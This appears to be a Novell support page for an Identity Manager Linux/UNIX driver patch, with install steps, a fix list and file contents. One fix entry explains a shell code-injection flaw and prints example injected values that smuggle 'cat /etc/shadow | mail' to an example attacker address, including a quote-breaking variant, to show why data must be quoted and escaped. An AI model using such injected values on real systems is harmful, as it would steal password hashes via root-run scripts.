IDM 3.0.1 Bi-directional Linux-UNIX Driver Patch 6
This document (5006480) is provided subject to the disclaimer at the end of this document.
patches this patch supersedes
| File | Product | Status | Patch |
|---|---|---|---|
| idm301bidirlinuxunixir3a.tar.gz | Identity Manager 3.0.1 | Obsolete | IDM 3.0.1 Bi-Directional Linux/Unix Driver Patch 3a |
patches that supersede this patch
abstract
Identity Manager 3.0.1 Bi-directional Linux and UNIX Driver field patch for nxdrv and scripts. This patch applies to the 3.1 version of the Linux and UNIX driver that shipped with Identity Manager 3.0.
details
Novell Identity Manager Integration Modules for Linux and UNIX 3.0
Installation Instructions
The install instructions are in two parts. If you have already installed the files from the patch IDM 3.0.1 Bi-directional Linux-UNIX Driver Patch 4, you only have to follow the instructions in part 2.
PART 1
1. Stop the driver shim:
/etc/init.d/nxdrvd stop
2. If you have modified any scripts, back them up before uninstalling and re-installing the new driver. These scripts are located at /usr/local/nxdrv/scripts/files (for /etc/passwd), /usr/local/nxdrv/scripts/nis (for NIS) and /usr/local/nxdrv/scripts/nisplus (for NIS+).
3. If you have already configured the driver for SSL and do not wish to re-configure the driver, back up the following to a temporary SECURE location:
/usr/local/nxdrv/keys/
4. Uninstall the existing driver: nxdrv-uninstall
5. Install the new driver:
sh _driver_install.bin
6. Restore the "keys" directory, if appropriate.
7. Restart the driver shim:
/etc/init.d/nxdrvd start
To install the driver shim (new installation):
1. Run the self-extracting installer:
sh _driver_install.bin
2. Accept the license agreement and follow the prompts to configure the driver shim.
3. Start the driver shim:
/etc/init.d/nxdrvd start
PART 2
1. Stop the driver shim:
/etc/init.d/nxdrvd stop
2. Copy the nxpwdpa binary for the appropriate OS to your /usr/local/nxdrv/bin/ directory.
3. Make the binary executable:
chmod +x /usr/local/nxdrv/bin/nxpwdpa
4. Start the driver shim:
/etc/init.d/nxdrvd start
Current issues:
- Fixed the nxpwdpa utility generating invalid password crypts. This could lead to a segmentation fault and the password not being synchronized for the user.
Previous issues:
- Fixed a NIS subscriber problem that can sometimes prevent passwords from being updated.
- Fixed a NIS subscriber problem on Solaris 8 where the passwd map does not get updated after password changes.
- Fixed the shadowLastChange attribute not getting updated on successful password updates.
- Fixed the shadowInactive field not being updated on Solaris.
- Fixed segmentation fault that can sometimes occur when the driver connects to the nxdrv (driver shim) for the first time.
- Fixed segmentation fault if the polling interval is set to 0.
- Fixed password synchronization with AIX 5.3 (64-bit mode). This bug manifests itself with an error message in the system log indicating that modify-password.sh reported a segmentation fault.
NOTE: This fix is an IBM-specific issue, which is merely a work-around until the issue is resolved. To activate the fix, you must also edit /usr/local/nxdrv/scripts/globals.sh on the affected AIX system and insert the line:
AIX_NO_PWHIST=1; export AIX_NO_PWHIST
into the user-modifiable section of the script.
- Renames do not lower-case the new name, even when the GCV is configured to lower-case CNs.
- Added GCV option to allow Login Enable commands to be transformed into modify-password commands for systems that do not natively support unlocking user passwords (through the passwd command). Such systems may include Solaris and HP-UX.
NOTE: For HP-UX, trusted mode, you may, instead, modify enable-user.sh to use the "/usr/lbin/modprpw -k" command to enable users.
- A security exploit could be used by modifying certain Unix fields in such a way that the scripts could execute arbitrary code. This is known as "code injection".
If you have modified the existing scripts, use extreme caution when interpreting data under the shell. Data should always be enclosed in double quotes (") to treat it as a single string parameter to other commands. In addition, the new idmlib.sh function IDMGETVAR will escape " and \ inside data values to allow them to be safely enclosed in quotes when evaluated by the shell with the "eval" command. "eval" is used by EXEC when executing commands and returning the output and return codes.
Without enclosing data in quotes, a typical command may be built as follows:
CMD="usermod -c $gecos"
Here, if $gecos contains data such as "hacker bob; cat /etc/shadow | mail hacker@hackers.net", the CMD variable, as interpreted by the shell, with "eval", would read:
usermod -c hacker bob; cat /etc/shadow | mail hacker@hackers.net
These are two legitimate commands and will both be executed by the nxdrv process, which runs as root. By enclosing the data in quotes, we have:
CMD="usermod -c \"$gecos\""
which the shell interprets as:
usermod -c "hacker bob; cat /etc/shadow | mail hacker@hackers.net"
Without escaping quotes (") and backslash (\), data can be arranged in such a way as to break the scriptwriter's quotes:
CMD="usermod -c \"$gecos\""
Here, if $gecos contains the value "hacker\" bob; cat /etc/shadow | mail hacker@hackers.net", then CMD will be interpreted, with "eval", as:
usermod -c "hacker" bob; cat /etc/shadow | mail hacker@hackers.net
When IDMGETVAR escapes these quotes, the data will safely be quoted and interpreted:
usermod -c "hacker\" bob; cat /etc/shadow | mail hacker@hackers.net"
- Fixed a problem where an invalid number of fields were created in the shadow map for NIS.
- Fixed a problem where the shadow map was not updated properly.
- Fixed a NIS problem where passwords were not being published.
- Fixed crash that can sometimes occur on shim startup.
- Fixed schema installation failure on eDir 8.8 servers due to an invalid path.
- Fixed HP-UX scripts to update /etc/shadow if the system is configured for shadow passwords.
- Fixed HP-UX scripts to use modprpw on trusted mode systems for enabling/disabling users.
- Added check-object-password functionality to support password synchronization checks in iManager.
- Fixed Linux NIS scripts to properly enable/disable users.
- Status documents did not contain event-id attributes, preventing operation-data tags from policy from correctly identifying the result of subscriber operations.
file contents
Compressed File Name: idm301bidirlinuxunixir6.tar.gz
| Files Included | Size | Date |
|---|---|---|
| idm301bidirlinuxunixir6/Linux/nxpwdpa | 727.5 KB (745008) | 2007-10-02 17:25:41 |
| idm301bidirlinuxunixir6/Solaris/nxpwdpa | 1.3 MB (1378280) | 2007-10-02 17:25:41 |
| idm301bidirlinuxunixir6/Solarisx86/nxpwdpa | 1.2 MB (1317016) | 2007-10-02 17:25:41 |
| readme_5006480.html | N/A | 2008-05-13 22:10:12 |
disclaimer
The Origin of this information may be internal or external to Novell. Novell makes all reasonable efforts to verify this information. However, the information provided in this document is for your information only. Novell makes no explicit or implied claims to the validity of this information. Any trademarks referenced in this document are the property of their respective owners. Consult your product manuals for complete trademark information.
Novell is a registered trademark of Novell, Inc. in the United States and other countries. SUSE is a registered trademark of SUSE Linux AG, a Novell business. *All third-party trademarks are the property of their respective owners.
© 2007 Novell, Inc. All Rights Reserved.